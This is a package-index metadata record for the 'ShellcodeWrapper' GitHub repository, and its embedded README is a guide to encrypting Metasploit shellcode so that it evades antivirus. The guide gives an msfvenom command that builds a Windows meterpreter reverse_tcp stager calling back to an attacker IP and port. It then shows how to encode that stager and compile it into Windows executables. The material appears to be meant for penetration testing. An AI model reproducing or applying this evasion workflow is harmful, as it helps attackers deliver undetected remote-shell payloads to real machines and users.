{"id":33245166,"url":"https://github.com/Arno0x/ShellcodeWrapper","last_synced_at":"2025-12-16T04:03:13.710Z","repository":{"id":58042822,"uuid":"79796885","full_name":"Arno0x/ShellcodeWrapper","owner":"Arno0x","description":"Shellcode wrapper with encryption for multiple target languages","archived":false,"fork":false,"pushed_at":"2017-01-23T11:09:14.000Z","size":7,"stargazers_count":422,"open_issues_count":3,"forks_count":123,"subscribers_count":12,"default_branch":"master","last_synced_at":"2024-04-09T20:30:31.856Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Arno0x.png","metadata":{"files":{"readme":"readme.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2017-01-23T11:06:30.000Z","updated_at":"2024-04-06T12:41:14.000Z","dependencies_parsed_at":"2022-08-28T12:13:04.094Z","dependency_job_id":null,"html_url":"https://github.com/Arno0x/ShellcodeWrapper","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/Arno0x/ShellcodeWrapper","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Arno0x%2FShellcodeWrapper","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Arno0x%2FShellcodeWrapper/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Arno0x%2FShellcodeWrapper/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Arno0x%2FShellcodeWrapper/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Arno0x","download_url":"https://codeload.github.com/Arno0x/ShellcodeWrapper/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Arno0x%2FShellcodeWrapper/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":27759450,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-12-16T02:00:10.477Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2025-11-16T21:00:32.219Z","updated_at":"2025-12-16T04:03:13.702Z","avatar_url":"https://github.com/Arno0x.png","language":"Python","readme":"Mutlibyte XOR or AES encrypted shellcode\r\n============\r\n\r\nAuthor: Arno0x0x - [@Arno0x0x](http://twitter.com/Arno0x0x)\r\n\r\nThese little proof of concept are inspired by this blogpost: [Bypass antivirus with 10 lines of code](http://www.attactics.org/2016/03/bypassing-antivirus-with-10-lines-of.html)\r\n\r\nThe technique uses two kind of code file:\r\n\r\n1. The shellcode encoder/encrypter: `shellcode_encoder.py`\r\n2. Various shellcode wrapper, in C++, C# and Python:\r\n\t- `encryptedShellcodeWrapper.cpp` - for now supports **only** XOR encryption\r\n\t- `encryptedShellcodeWrapper.cs` - supports both XOR and AES encryption\r\n\t- `encryptedShellcodeWrapper.py` - supports both XOR and AES encryption\r\n\r\nInstallation\r\n----------------------\r\nInstallation is straight forward:\r\n* Git clone this repository: `git clone https://github.com/Arno0x/ShellcodeWrapper ShellcodeWrapper`\r\n* cd into the ShellcodeWrapper folder: `cd ShellcodeWrapper`\r\n* Install requirements using `pip install -r requirements.txt`\r\n* Give the execution rights to the main script: `chmod +x shellcode_encoder.py`\r\n\r\nUsage\r\n----------------------\r\nFirst, you need to obtain a usable shellcode from metasploit (*run it from a Kali distribution*), for example:\r\n```\r\nroot@kali:~# msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.52.130 LPORT=4444 -f raw \u003e shellcode.raw\r\n```\r\n\r\nIn this example, the output is a raw (*unencoded \u0026 unencrypted*) reverse_tcp meterpreter stager for x86 platform. You should adapt it to your needs (*payload and parameters*).\r\n\r\nSecond, run the `shellcode_encoder.py` script along with the desired arguments:\r\n  - raw shellcode filename\r\n  - encryption key\r\n  - encryption type: `xor` or `aes`\r\n  - desired output: `base64`, `cpp`, `csharp`, `python`\r\n\r\nFor instance, to xor encrypt the shellcode with the key '*thisismykey*' and get an output code file in C#, C++ and Python:\r\n```\r\nroot@kali:~# ./shellcode_encoder.py -cpp -cs -py shellcode.raw thisismykey xor\r\n```\r\nThis will generate C#, C++ and Python code file in the `result` folder. Those files are ready to use/compile.\r\n\r\nEventually:\r\n\r\n1. For the C++ wrapper, compile the C++ code file into a Windows executable: you can create a new VisualStudio project for **Win32 console application** and use the C++ code provided as the main file. Any other method of compilation will require slight adjustment of the C++ code (headers mostly).\r\n2. For the C# wrapper, compile the C# code file into a Windows executable:\r\n\t`C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe /unsafe /out:multibyteEncodeShellcode.exe multibyteEncodeShellcode.cs`\r\n3. For the Python wrapper, just run it as a python script, or use PyInstaller to make it a Windows standalone executable\r\n","funding_links":[],"categories":["Pentesting"],"sub_categories":["ShellCodes"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FArno0x%2FShellcodeWrapper","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FArno0x%2FShellcodeWrapper","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FArno0x%2FShellcodeWrapper/lists"}